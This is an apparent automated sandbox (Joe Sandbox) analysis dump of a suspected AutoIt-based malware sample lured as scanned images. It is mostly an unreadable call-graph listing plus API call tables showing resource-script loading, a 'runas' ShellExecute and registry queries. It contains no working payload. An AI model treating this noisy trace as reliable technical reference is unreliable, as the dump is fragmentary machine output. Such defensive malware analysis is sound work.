45a961 22 API calls 95152->95153 95154 451292 95153->95154 95192 45171c 95154->95192 95158 4512c4 95159 45a961 22 API calls 95158->95159 95160 4512ce 95159->95160 95213 461940 95160->95213 95162 4512f9 95223 451aab 95162->95223 95164 451315 95165 451325 GetStdHandle 95164->95165 95166 492485 95165->95166 95167 45137a 95165->95167 95166->95167 95168 49248e 95166->95168 95170 451387 OleInitialize 95167->95170 95230 46fddb 95168->95230 95170->95137 95171 492495 95240 4c011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 95171->95240 95173 49249e 95241 4c0944 CreateThread 95173->95241 95175 4924aa CloseHandle 95175->95167 95176->95139 95242 4513f1 95177->95242 95180 4513f1 22 API calls 95181 4513d0 95180->95181 95182 45a961 22 API calls 95181->95182 95183 4513dc 95182->95183 95249 456b57 95183->95249 95185 451129 95186 451bc3 6 API calls 95185->95186 95186->95144 95188 46fe0b 22 API calls 95187->95188 95189 45a976 95188->95189 95190 46fddb 22 API calls 95189->95190 95191 451174 95190->95191 95191->95147 95193 45a961 22 API calls 95192->95193 95194 45172c 95193->95194 95195 45a961 22 API calls 95194->95195 95196 451734 95195->95196 95197 45a961 22 API calls 95196->95197 95198 45174f 95197->95198 95199 46fddb 22 API calls 95198->95199 95200 45129c 95199->95200 95201 451b4a 95200->95201 95202 451b58 95201->95202 95203 45a961 22 API calls 95202->95203 95204 451b63 95203->95204 95205 45a961 22 API calls 95204->95205 95206 451b6e 95205->95206 95207 45a961 22 API calls 95206->95207 95208 451b79 95207->95208 95209 45a961 22 API calls 95208->95209 95210 451b84 95209->95210 95211 46fddb 22 API calls 95210->95211 95212 451b96 RegisterWindowMessageW 95211->95212 95212->95158 95214 461981 95213->95214 95215 46195d 95213->95215 95272 470242 5 API calls __Init_thread_wait 95214->95272 95222 46196e 95215->95222 95274 470242 5 API calls __Init_thread_wait 95215->95274 95218 46198b 95218->95215 95273 4701f8 
EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95218->95273 95219 468727 95219->95222 95275 4701f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95219->95275 95222->95162 95224 49272d 95223->95224 95225 451abb 95223->95225 95276 4c3209 23 API calls 95224->95276 95226 46fddb 22 API calls 95225->95226 95228 451ac3 95226->95228 95228->95164 95229 492738 95232 46fde0 95230->95232 95231 47ea0c ___std_exception_copy 21 API calls 95231->95232 95232->95231 95233 46fdfa 95232->95233 95235 46fdfc 95232->95235 95277 474ead 7 API calls 2 library calls 95232->95277 95233->95171 95239 47066d 95235->95239 95278 4732a4 RaiseException 95235->95278 95237 47068a 95237->95171 95279 4732a4 RaiseException 95239->95279 95240->95173 95241->95175 95280 4c092a 28 API calls 95241->95280 95243 45a961 22 API calls 95242->95243 95244 4513fc 95243->95244 95245 45a961 22 API calls 95244->95245 95246 451404 95245->95246 95247 45a961 22 API calls 95246->95247 95248 4513c6 95247->95248 95248->95180 95250 456b67 _wcslen 95249->95250 95251 494ba1 95249->95251 95254 456ba2 95250->95254 95255 456b7d 95250->95255 95262 4593b2 95251->95262 95253 494baa 95253->95253 95256 46fddb 22 API calls 95254->95256 95261 456f34 22 API calls 95255->95261 95258 456bae 95256->95258 95259 46fe0b 22 API calls 95258->95259 95260 456b85 __fread_nolock 95259->95260 95260->95185 95261->95260 95263 4593c0 95262->95263 95264 4593c9 __fread_nolock 95262->95264 95263->95264 95266 45aec9 95263->95266 95264->95253 95267 45aedc 95266->95267 95271 45aed9 __fread_nolock 95266->95271 95268 46fddb 22 API calls 95267->95268 95269 45aee7 95268->95269 95270 46fe0b 22 API calls 95269->95270 95270->95271 95271->95264 95272->95218 95273->95215 95274->95219 95275->95222 95276->95229 95277->95232 95278->95239 95279->95237 95281 452de3 95282 452df0 __wsopen_s 95281->95282 95283 492c2b ___scrt_fastfail 95282->95283 95284 452e09 95282->95284 95286 492c47 GetOpenFileNameW 95283->95286 95297 453aa2 95284->95297 95288 
492c96 95286->95288 95290 456b57 22 API calls 95288->95290 95292 492cab 95290->95292 95292->95292 95294 452e27 95325 4544a8 95294->95325 95355 491f50 95297->95355 95300 453ace 95302 456b57 22 API calls 95300->95302 95301 453ae9 95361 45a6c3 95301->95361 95304 453ada 95302->95304 95357 4537a0 95304->95357 95307 452da5 95308 491f50 __wsopen_s 95307->95308 95309 452db2 GetLongPathNameW 95308->95309 95310 456b57 22 API calls 95309->95310 95311 452dda 95310->95311 95312 453598 95311->95312 95313 45a961 22 API calls 95312->95313 95314 4535aa 95313->95314 95315 453aa2 23 API calls 95314->95315 95316 4535b5 95315->95316 95317 4932eb 95316->95317 95318 4535c0 95316->95318 95323 49330d 95317->95323 95379 46ce60 41 API calls 95317->95379 95367 45515f 95318->95367 95324 4535df 95324->95294 95380 454ecb 95325->95380 95328 493833 95402 4c2cf9 95328->95402 95329 454ecb 94 API calls 95331 4544e1 95329->95331 95331->95328 95333 4544e9 95331->95333 95332 493848 95334 493869 95332->95334 95335 49384c 95332->95335 95337 4544f5 95333->95337 95338 493854 95333->95338 95336 46fe0b 22 API calls 95334->95336 95446 454f39 95335->95446 95351 4938ae 95336->95351 95445 45940c 136 API calls 2 library calls 95337->95445 95452 4bda5a 82 API calls 95338->95452 95342 493862 95342->95334 95343 452e31 95344 493a5f 95349 493a67 95344->95349 95345 454f39 68 API calls 95345->95349 95349->95345 95455 4b989b 82 API calls __wsopen_s 95349->95455 95351->95344 95351->95349 95352 459cb3 22 API calls 95351->95352 95428 4b967e 95351->95428 95431 45a4a1 95351->95431 95439 453ff7 95351->95439 95453 4b95ad 42 API calls _wcslen 95351->95453 95454 4c0b5a 22 API calls 95351->95454 95352->95351 95356 453aaf GetFullPathNameW 95355->95356 95356->95300 95356->95301 95358 4537ae 95357->95358 95359 4593b2 22 API calls 95358->95359 95360 452e12 95359->95360 95360->95307 95362 45a6d0 95361->95362 95363 45a6dd 95361->95363 95362->95304 95364 46fddb 22 API calls 95363->95364 95365 45a6e7 95364->95365 95366 46fe0b 22 API calls 
95365->95366 95366->95362 95368 45516e 95367->95368 95372 45518f __fread_nolock 95367->95372 95370 46fe0b 22 API calls 95368->95370 95369 46fddb 22 API calls 95371 4535cc 95369->95371 95370->95372 95373 4535f3 95371->95373 95372->95369 95374 453605 95373->95374 95378 453624 __fread_nolock 95373->95378 95376 46fe0b 22 API calls 95374->95376 95375 46fddb 22 API calls 95377 45363b 95375->95377 95376->95378 95377->95324 95378->95375 95379->95317 95456 454e90 LoadLibraryA 95380->95456 95385 454ef6 LoadLibraryExW 95464 454e59 LoadLibraryA 95385->95464 95386 493ccf 95387 454f39 68 API calls 95386->95387 95389 493cd6 95387->95389 95392 454e59 3 API calls 95389->95392 95395 493cde 95392->95395 95393 454f20 95394 454f2c 95393->95394 95393->95395 95396 454f39 68 API calls 95394->95396 95486 4550f5 95395->95486 95398 4544cd 95396->95398 95398->95328 95398->95329 95401 493d05 95403 4c2d15 95402->95403 95404 45511f 64 API calls 95403->95404 95405 4c2d29 95404->95405 95636 4c2e66 95405->95636 95408 4550f5 40 API calls 95409 4c2d56 95408->95409 95410 4550f5 40 API calls 95409->95410 95411 4c2d66 95410->95411 95412 4550f5 40 API calls 95411->95412 95413 4c2d81 95412->95413 95414 4550f5 40 API calls 95413->95414 95415 4c2d9c 95414->95415 95416 45511f 64 API calls 95415->95416 95417 4c2db3 95416->95417 95418 47ea0c ___std_exception_copy 21 API calls 95417->95418 95419 4c2dba 95418->95419 95420 47ea0c ___std_exception_copy 21 API calls 95419->95420 95421 4c2dc4 95420->95421 95422 4550f5 40 API calls 95421->95422 95423 4c2dd8 95422->95423 95424 4c28fe 27 API calls 95423->95424 95425 4c2dee 95424->95425 95427 4c2d3f 95425->95427 95642 4c22ce 95425->95642 95427->95332 95429 46fe0b 22 API calls 95428->95429 95430 4b96ae __fread_nolock 95429->95430 95430->95351 95432 45a52b 95431->95432 95436 45a4b1 __fread_nolock 95431->95436 95434 46fe0b 22 API calls 95432->95434 95433 46fddb 22 API calls 95435 45a4b8 95433->95435 95434->95436 95437 46fddb 22 API calls 95435->95437 95438 45a4d6 
[Execution graph residue: the report's interactive call-graph export, a list of node IDs, code addresses and edges that does not survive as readable text. Windows API calls named on the graph nodes: GetProcAddress, FreeLibrary, CreateStreamOnHGlobal, FindResourceExW, LoadResource, SizeofResource, LockResource, EnterCriticalSection, LeaveCriticalSection, RtlAllocateHeap, RtlFreeHeap, GetLastError, CreateFileW, ReadFile, WriteFile, SetFilePointerEx, CloseHandle, GetFileType, GetFileAttributesW, FindFirstFileW, FindClose, lstrlenW, VirtualAlloc, VirtualProtect, VirtualFree, GetPEB, Sleep, ExitProcess, GetCurrentProcess, TerminateProcess, GetExitCodeProcess, WaitForSingleObject, PeekMessageW, GetInputState, TranslateAcceleratorW, TranslateMessage, DispatchMessageW, IsDialogMessageW, GetClassLongW, GetForegroundWindow, timeGetTime, QueryPerformanceCounter, QueryPerformanceFrequency, SetEvent, ResetEvent, CharUpperBuffW, CharLowerBuffW, SystemParametersInfoW, GetModuleFileNameW, SetCurrentDirectoryW, ShellExecuteW, Shell_NotifyIconW, CreateWindowExW, ShowWindow, DestroyIcon, LoadStringW, PostQuitMessage, DefWindowProcW, SetTimer, KillTimer, RegisterWindowMessageW, CreatePopupMenu.]
Shell_NotifyIconW ___scrt_fastfail 96844->96875 96851 492da1 96845->96851 96852 492dd7 MoveWindow 96845->96852 96846 492e1c 96880 46e499 42 API calls 96846->96880 96847->96871 96883 4bc161 27 API calls ___scrt_fastfail 96848->96883 96856 492e4d 96849->96856 96857 4531b9 96849->96857 96859 492da7 96851->96859 96860 492dc6 SetFocus 96851->96860 96852->96871 96856->96834 96882 4b0ad7 22 API calls 96856->96882 96863 453253 96857->96863 96869 4531c4 96857->96869 96858 492e8e 96858->96834 96858->96871 96864 492db0 96859->96864 96859->96869 96860->96871 96861 453214 96876 453c50 DeleteObject DestroyWindow 96861->96876 96862 453263 96862->96871 96877 45326f 44 API calls ___scrt_fastfail 96863->96877 96878 4518e2 10 API calls 96864->96878 96869->96834 96881 4530f2 Shell_NotifyIconW ___scrt_fastfail 96869->96881 96872 492e41 96873 453837 49 API calls 96872->96873 96873->96874 96874->96834 96875->96861 96876->96871 96877->96862 96878->96871 96879->96846 96880->96869 96881->96872 96882->96874 96883->96862 96884->96858 96885 451033 96890 454c91 96885->96890 96889 451042 96891 45a961 22 API calls 96890->96891 96892 454cff 96891->96892 96898 453af0 96892->96898 96895 454d9c 96896 451038 96895->96896 96901 4551f7 22 API calls __fread_nolock 96895->96901 96897 4700a3 29 API calls __onexit 96896->96897 96897->96889 96902 453b1c 96898->96902 96901->96895 96903 453b0f 96902->96903 96904 453b29 96902->96904 96903->96895 96904->96903 96905 453b30 RegOpenKeyExW 96904->96905 96905->96903 96906 453b4a RegQueryValueExW 96905->96906 96907 453b80 RegCloseKey 96906->96907 96908 453b6b 96906->96908 96907->96903 96908->96907 96909 45f7bf 96910 45fcb6 96909->96910 96911 45f7d3 96909->96911 96946 45aceb 23 API calls ISource 96910->96946 96913 45fcc2 96911->96913 96915 46fddb 22 API calls 96911->96915 96947 45aceb 23 API calls ISource 96913->96947 96916 45f7e5 96915->96916 96916->96913 96917 45f83e 96916->96917 96918 45fd3d 96916->96918 96920 461310 207 API calls 96917->96920 96933 45ed9d ISource 
96917->96933 96948 4c1155 22 API calls 96918->96948 96941 45ec76 ISource 96920->96941 96921 4a4beb 96952 4c359c 82 API calls __wsopen_s 96921->96952 96923 46fddb 22 API calls 96923->96941 96924 45fef7 96930 45a8c7 22 API calls 96924->96930 96924->96933 96926 4a4b0b 96950 4c359c 82 API calls __wsopen_s 96926->96950 96927 45a8c7 22 API calls 96927->96941 96928 4a4600 96928->96933 96934 45a8c7 22 API calls 96928->96934 96930->96933 96934->96933 96935 45fbe3 96935->96933 96937 4a4bdc 96935->96937 96943 45f3ae ISource 96935->96943 96936 45a961 22 API calls 96936->96941 96951 4c359c 82 API calls __wsopen_s 96937->96951 96938 470242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96938->96941 96940 4700a3 29 API calls pre_c_initialization 96940->96941 96941->96921 96941->96923 96941->96924 96941->96926 96941->96927 96941->96928 96941->96933 96941->96935 96941->96936 96941->96938 96941->96940 96942 4701f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96941->96942 96941->96943 96944 4601e0 207 API calls 2 library calls 96941->96944 96945 4606a0 41 API calls ISource 96941->96945 96942->96941 96943->96933 96949 4c359c 82 API calls __wsopen_s 96943->96949 96944->96941 96945->96941 96946->96913 96947->96918 96948->96933 96949->96933 96950->96933 96951->96921 96952->96933 96953 4703fb 96954 470407 __FrameHandler3::FrameUnwindToState 96953->96954 96982 46feb1 96954->96982 96956 47040e 96957 470561 96956->96957 96960 470438 96956->96960 97009 47083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 96957->97009 96959 470568 97010 474e52 28 API calls _abort 96959->97010 96970 470477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 96960->96970 96993 48247d 96960->96993 96962 47056e 97011 474e04 28 API calls _abort 96962->97011 96966 470576 96967 470457 96969 4704d8 97001 470959 96969->97001 96970->96969 
97005 474e1a 38 API calls 2 library calls 96970->97005 96973 4704de 96974 4704f3 96973->96974 97006 470992 GetModuleHandleW 96974->97006 96976 4704fa 96976->96959 96977 4704fe 96976->96977 96978 470507 96977->96978 97007 474df5 28 API calls _abort 96977->97007 97008 470040 13 API calls 2 library calls 96978->97008 96981 47050f 96981->96967 96983 46feba 96982->96983 97012 470698 IsProcessorFeaturePresent 96983->97012 96985 46fec6 97013 472c94 10 API calls 3 library calls 96985->97013 96987 46fecb 96988 46fecf 96987->96988 97014 482317 96987->97014 96988->96956 96991 46fee6 96991->96956 96995 482494 96993->96995 96994 470a8c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 96996 470451 96994->96996 96995->96994 96996->96967 96997 482421 96996->96997 96998 482450 96997->96998 96999 470a8c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 96998->96999 97000 482479 96999->97000 97000->96970 97065 472340 97001->97065 97003 47096c GetStartupInfoW 97004 47097f 97003->97004 97004->96973 97005->96969 97006->96976 97007->96978 97008->96981 97009->96959 97010->96962 97011->96966 97012->96985 97013->96987 97018 48d1f6 97014->97018 97017 472cbd 8 API calls 3 library calls 97017->96988 97021 48d213 97018->97021 97022 48d20f 97018->97022 97020 46fed8 97020->96991 97020->97017 97021->97022 97024 484bfb 97021->97024 97036 470a8c 97022->97036 97025 484c07 __FrameHandler3::FrameUnwindToState 97024->97025 97043 482f5e EnterCriticalSection 97025->97043 97027 484c0e 97044 4850af 97027->97044 97029 484c1d 97035 484c2c 97029->97035 97057 484a8f 29 API calls 97029->97057 97032 484c27 97058 484b45 GetStdHandle GetFileType 97032->97058 97033 484c3d __wsopen_s 97033->97021 97059 484c48 LeaveCriticalSection _abort 97035->97059 97037 470a97 IsProcessorFeaturePresent 97036->97037 97038 470a95 97036->97038 97040 470c5d 97037->97040 97038->97020 97064 470c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 97040->97064 97042 
470d40 97042->97020 97043->97027 97045 4850bb __FrameHandler3::FrameUnwindToState 97044->97045 97046 4850c8 97045->97046 97047 4850df 97045->97047 97061 47f2d9 20 API calls _abort 97046->97061 97060 482f5e EnterCriticalSection 97047->97060 97050 4850cd 97062 4827ec 26 API calls __wsopen_s 97050->97062 97052 4850d7 __wsopen_s 97052->97029 97053 485117 97063 48513e LeaveCriticalSection _abort 97053->97063 97054 4850eb 97054->97053 97056 485000 __wsopen_s 21 API calls 97054->97056 97056->97054 97057->97032 97058->97035 97059->97033 97060->97054 97061->97050 97062->97052 97063->97052 97064->97042 97066 472357 97065->97066 97066->97003 97066->97066 97067 451098 97072 4542de 97067->97072 97071 4510a7 97073 45a961 22 API calls 97072->97073 97074 4542f5 GetVersionExW 97073->97074 97075 456b57 22 API calls 97074->97075 97076 454342 97075->97076 97077 4593b2 22 API calls 97076->97077 97080 454378 97076->97080 97078 45436c 97077->97078 97079 4537a0 22 API calls 97078->97079 97079->97080 97081 45441b GetCurrentProcess IsWow64Process 97080->97081 97088 4937df 97080->97088 97082 454437 97081->97082 97083 45444f LoadLibraryA 97082->97083 97084 493824 GetSystemInfo 97082->97084 97085 454460 GetProcAddress 97083->97085 97086 45449c GetSystemInfo 97083->97086 97085->97086 97089 454470 GetNativeSystemInfo 97085->97089 97087 454476 97086->97087 97090 45109d 97087->97090 97091 45447a FreeLibrary 97087->97091 97089->97087 97092 4700a3 29 API calls __onexit 97090->97092 97091->97090 97092->97071 97093 45105b 97098 45344d 97093->97098 97095 45106a 97129 4700a3 29 API calls __onexit 97095->97129 97097 451074 97099 45345d __wsopen_s 97098->97099 97100 45a961 22 API calls 97099->97100 97101 453513 97100->97101 97102 453a5a 24 API calls 97101->97102 97103 45351c 97102->97103 97130 453357 97103->97130 97106 4533c6 22 API calls 97107 453535 97106->97107 97108 45515f 22 API calls 97107->97108 97109 453544 97108->97109 97110 45a961 22 API calls 97109->97110 97111 45354d 97110->97111 97112 45a6c3 
22 API calls 97111->97112 97113 453556 RegOpenKeyExW 97112->97113 97114 493176 RegQueryValueExW 97113->97114 97118 453578 97113->97118 97115 49320c RegCloseKey 97114->97115 97116 493193 97114->97116 97115->97118 97128 49321e _wcslen 97115->97128 97117 46fe0b 22 API calls 97116->97117 97119 4931ac 97117->97119 97118->97095 97120 455722 22 API calls 97119->97120 97121 4931b7 RegQueryValueExW 97120->97121 97122 4931d4 97121->97122 97125 4931ee ISource 97121->97125 97123 456b57 22 API calls 97122->97123 97123->97125 97124 454c6d 22 API calls 97124->97128 97125->97115 97126 459cb3 22 API calls 97126->97128 97127 45515f 22 API calls 97127->97128 97128->97118 97128->97124 97128->97126 97128->97127 97129->97097 97131 491f50 __wsopen_s 97130->97131 97132 453364 GetFullPathNameW 97131->97132 97133 453386 97132->97133 97134 456b57 22 API calls 97133->97134 97135 4533a4 97134->97135 97135->97106

                                                                                APIs
                                                                                • GetVersionExW.KERNEL32(?), ref: 0045430D
                                                                                  • Part of subcall function 00456B57: _wcslen.LIBCMT ref: 00456B6A
                                                                                • GetCurrentProcess.KERNEL32(?,004ECB64,00000000,?,?), ref: 00454422
                                                                                • IsWow64Process.KERNEL32(00000000,?,?), ref: 00454429
                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00454454
                                                                                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00454466
                                                                                • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00454474
                                                                                • FreeLibrary.KERNEL32(00000000,?,?), ref: 0045447B
                                                                                • GetSystemInfo.KERNEL32(?,?,?), ref: 004544A0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                • API String ID: 3290436268-3101561225
                                                                                • Opcode ID: 959a05911e8203511571b9cdb0bac9a692c6a4848dcc758ae86540ac2a936365
                                                                                • Instruction ID: babe8a42e6f413c8375601808576abb9e8e0803e2490286b0998542110977039
                                                                                • Opcode Fuzzy Hash: 959a05911e8203511571b9cdb0bac9a692c6a4848dcc758ae86540ac2a936365
                                                                                • Instruction Fuzzy Hash: 05A1F862909AD0CFCB31CB697C841977FE66F77345B145CAAD44097722D228094FEB2E

                                                                                APIs
                                                                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,004550AA,?,?,00000000,00000000), ref: 004542B2
                                                                                • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,004550AA,?,?,00000000,00000000), ref: 004542C9
                                                                                • LoadResource.KERNEL32(?,00000000,?,?,004550AA,?,?,00000000,00000000,?,?,?,?,?,?,00454F20), ref: 004935BE
                                                                                • SizeofResource.KERNEL32(?,00000000,?,?,004550AA,?,?,00000000,00000000,?,?,?,?,?,?,00454F20), ref: 004935D3
                                                                                • LockResource.KERNEL32(004550AA,?,?,004550AA,?,?,00000000,00000000,?,?,?,?,?,?,00454F20,?), ref: 004935E6
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                • String ID: SCRIPT
                                                                                • API String ID: 3051347437-3967369404
                                                                                • Opcode ID: 70d6f82660b5fa3f85cf1038757dc770429d5e110491014777d943d30d36a19a
                                                                                • Instruction ID: 75ed67754c6c604d31e45b43c9c53b8b12214b266b346f5da3e90256e1edca32
                                                                                • Opcode Fuzzy Hash: 70d6f82660b5fa3f85cf1038757dc770429d5e110491014777d943d30d36a19a
                                                                                • Instruction Fuzzy Hash: 0511CE70600301BFDB218B65DC88F277BB9EFC5B96F2041AAF903CA291DB71DC068665

                                                                                APIs
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00452B6B
                                                                                  • Part of subcall function 00453A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00521418,?,00452E7F,?,?,?,00000000), ref: 00453A78
                                                                                  • Part of subcall function 00459CB3: _wcslen.LIBCMT ref: 00459CBD
                                                                                • GetForegroundWindow.USER32(runas,?,?,?,?,?,00512224), ref: 00492C10
                                                                                • ShellExecuteW.SHELL32(00000000,?,?,00512224), ref: 00492C17
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                                                                • String ID: runas
                                                                                • API String ID: 448630720-4000483414
                                                                                • Opcode ID: df210a6ac257138d55902ac4375985d82374d2501d7b738dc0e6180d0021b0f1
                                                                                • Instruction ID: f64566410f8ea76675a4be1f4b43f367cc6257d259289fc73f5fb63cd177a1bb
                                                                                • Opcode Fuzzy Hash: df210a6ac257138d55902ac4375985d82374d2501d7b738dc0e6180d0021b0f1
                                                                                • Instruction Fuzzy Hash: 1C11EB31104345AACB14FF21D9919AE7BA5AFA2747F44042FFC46020A3DF78994EC75A
                                                                                APIs
                                                                                • GetInputState.USER32 ref: 0045D807
                                                                                • timeGetTime.WINMM ref: 0045DA07
                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0045DB28
                                                                                • TranslateMessage.USER32(?), ref: 0045DB7B
                                                                                • DispatchMessageW.USER32(?), ref: 0045DB89
                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0045DB9F
                                                                                • Sleep.KERNEL32(0000000A), ref: 0045DBB1
                                                                                Similarity
                                                                                • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                • String ID:
                                                                                • API String ID: 2189390790-0
                                                                                • Opcode ID: fdfcb41e7058bca633c8f0106a44ab5a5e5c4311088f8785d6789b08d9629c3f
                                                                                • Instruction ID: 5980e07657dc114a6b6143f1586959ae71397f788b64b2575bacb261495b16e1
                                                                                • Opcode Fuzzy Hash: fdfcb41e7058bca633c8f0106a44ab5a5e5c4311088f8785d6789b08d9629c3f
                                                                                • Instruction Fuzzy Hash: 6342F370A04241DFD734CF25C884BABB7A1BF56305F14451FE856873A2D7B8E849DB8A

                                                                                APIs
                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00452D07
                                                                                • RegisterClassExW.USER32(00000030), ref: 00452D31
                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00452D42
                                                                                • InitCommonControlsEx.COMCTL32(?), ref: 00452D5F
                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00452D6F
                                                                                • LoadIconW.USER32(000000A9), ref: 00452D85
                                                                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00452D94
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                • API String ID: 2914291525-1005189915
                                                                                • Opcode ID: 463af00f0d8c18ee1c456aa3683d0cbcc8a1d9b1ff42be713a645beb3481d670
                                                                                • Instruction ID: 08a2d57615731d76dc1c9b0d1d903e2b97c2b75c2ff148221c1dc60556150d29
                                                                                • Opcode Fuzzy Hash: 463af00f0d8c18ee1c456aa3683d0cbcc8a1d9b1ff42be713a645beb3481d670
                                                                                • Instruction Fuzzy Hash: 5E21F7B1901349AFDB10DFA4EC89BDEBBB4FB19701F00812AF511AA2A0D7B50546DF99

Control-flow Graph (recovered from the graph dump): function at 0x49065B, basic blocks 0x49065B-0x490983. The open path goes through subcall 0049039A (CreateFileW) and then GetFileType; each failure branch calls GetLastError and __dosmaperr (call 0047F2A3, the references at 00490776, 00490795 and 00490938), with CloseHandle on the failed-handle branch (0x49078C-0x4907BD) and on the close-and-reopen path (0x4908FC-0x49092F, CloseHandle then 0049039A again). Other subcalls: 0049042F, 0047F2C6, 0047F2D9, 00485221, 0048516A, 004905AB, 0049014D, 004886AE, 00485333.

APIs
  • Part of subcall function 0049039A: CreateFileW.KERNELBASE(00000000,00000000,?,00490704,?,?,00000000,?,00490704,00000000,0000000C), ref: 004903B7
• GetLastError.KERNEL32 ref: 0049076F
• __dosmaperr.LIBCMT ref: 00490776
• GetFileType.KERNELBASE(00000000), ref: 00490782
• GetLastError.KERNEL32 ref: 0049078C
• __dosmaperr.LIBCMT ref: 00490795
• CloseHandle.KERNEL32(00000000), ref: 004907B5
• CloseHandle.KERNEL32(?), ref: 004908FF
• GetLastError.KERNEL32 ref: 00490931
• __dosmaperr.LIBCMT ref: 00490938
Strings
Memory Dump Source
• Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
Similarity
• API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
• String ID: H
• API String ID: 4237864984-2852464175
• Opcode ID: af282b47550ed7f352f6e64701acbcb583d790c52155a3869c27289e2231030d
• Instruction ID: dfa2e89df4b69bac3fa26ed0e1969bd96c321a3133d136d2bc8529c79230d3b8
• Opcode Fuzzy Hash: af282b47550ed7f352f6e64701acbcb583d790c52155a3869c27289e2231030d
• Instruction Fuzzy Hash: ABA12732A001048FDF29EF68D8917AE7FA0AB46324F14416EF8159B3D2D7399C17DB99

Control-flow Graph

APIs
  • Part of subcall function 00453A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00521418,?,00452E7F,?,?,?,00000000), ref: 00453A78
  • Part of subcall function 00453357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00453379
• RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0045356A
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0049318D
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 004931CE
• RegCloseKey.ADVAPI32(?), ref: 00493210
• _wcslen.LIBCMT ref: 00493277
• _wcslen.LIBCMT ref: 00493286
Strings
Memory Dump Source
• Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
